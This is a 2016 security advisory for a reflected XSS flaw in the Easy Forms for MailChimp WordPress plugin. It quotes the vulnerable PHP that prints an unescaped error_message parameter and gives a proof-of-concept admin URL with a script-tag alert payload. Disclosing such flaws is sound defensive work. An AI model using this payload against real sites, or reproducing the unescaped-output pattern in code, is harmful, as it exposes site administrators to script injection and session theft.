Easy Forms for MailChimp [Reflected XSS]

Description

Easy Forms for MailChimp is vulnerable to a Reflected XSS attack. The vulnerable code is in yikes-inc-easy-mailchimp-extender/admin/partials/menu/options.php file, lines 72-82:

// ...
if( isset( $_GET['error_log_created'] ) && $_GET['error_log_created'] == 'true' ) {
    ?>
    <div class="updated">
        <p><?php _e( 'Error log successfully created. You may now start logging errors.', 'yikes-inc-easy-mailchimp-extender' ); ?></p>
    </div>
    <?php
} else if( isset( $_GET['error_log_created'] ) && $_GET['error_log_created'] == 'false' ) {
    ?>
    <div class="error">
        <p><?php _e( urldecode( $_GET['error_message'] ) , 'yikes-inc-easy-mailchimp-extender' ); ?></p>
    </div>
    <?php
}
// ...

If the param $_GET['error_log_created'] is set and is equal to 'false' then the $_GET['error_message'] param is printed without proper escaping.

PoC

http://sbwp4.dev/wp-admin/admin.php?page=yikes-inc-easy-mailchimp-settings&error_log_created=false&error_message=<script>alert(/XSS/)</script>

---

WordPress Plugins Reflected XSS XSS

---

INFO

• 14 July 2016
• Pan Vag
• yikesplugins.com
• wordpress.org
• WordPress 4.5.2
• DWF-2016-87089